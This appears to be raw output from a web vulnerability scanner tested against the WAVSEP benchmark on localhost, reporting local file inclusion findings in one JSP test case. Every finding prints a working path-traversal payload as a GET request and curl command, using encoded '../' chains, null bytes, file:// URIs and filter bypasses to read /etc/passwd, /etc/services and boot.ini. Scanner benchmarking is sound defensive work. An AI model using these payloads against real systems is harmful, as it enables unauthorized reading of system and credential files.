curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
